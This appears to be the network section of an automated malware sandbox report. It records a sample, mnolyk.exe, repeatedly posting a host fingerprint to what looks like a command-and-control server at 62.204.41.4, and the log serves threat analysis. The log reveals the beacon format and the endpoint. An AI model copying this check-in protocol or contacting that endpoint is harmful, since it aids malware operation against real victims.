                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:25.180715084 CET342INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        141192.168.2.54983162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:25.452284098 CET342OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:25.517364025 CET343INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        142192.168.2.54983262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:25.693521023 CET343OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:25.756983042 CET344INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        143192.168.2.54983362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:25.956223965 CET344OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:26.021404982 CET345INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        144192.168.2.54983462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:26.192656994 CET345OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:26.258816957 CET346INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        145192.168.2.54983562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:26.426112890 CET346OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:26.489983082 CET347INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        146192.168.2.54983662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:26.660548925 CET347OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:26.724510908 CET348INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        147192.168.2.54983762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:26.897782087 CET348OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:26.959956884 CET349INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        148192.168.2.54983862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:27.131716013 CET349OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:27.198204041 CET350INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        149192.168.2.54983962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:27.377568007 CET350OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:27.444006920 CET351INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        15192.168.2.54970562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:32.323528051 CET215OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:32.386897087 CET216INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        150192.168.2.54984062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:27.625202894 CET351OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:27.689275026 CET352INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        151192.168.2.54984162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:27.862567902 CET352OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:27.928556919 CET353INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        152192.168.2.54984262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:28.111422062 CET353OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:28.177723885 CET354INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        153192.168.2.54984362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:28.350641966 CET354OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:28.415501118 CET355INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        154192.168.2.54984462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:28.581101894 CET355OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:28.644062996 CET356INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        155192.168.2.54984562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:28.815135002 CET356OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:28.877813101 CET357INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        156192.168.2.54984662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:29.052087069 CET357OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:29.116605043 CET358INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        157192.168.2.54984762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:29.282943964 CET358OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:29.346607924 CET359INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        158192.168.2.54984862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:29.531647921 CET359OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:29.596512079 CET360INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        159192.168.2.54984962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:29.835563898 CET360OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
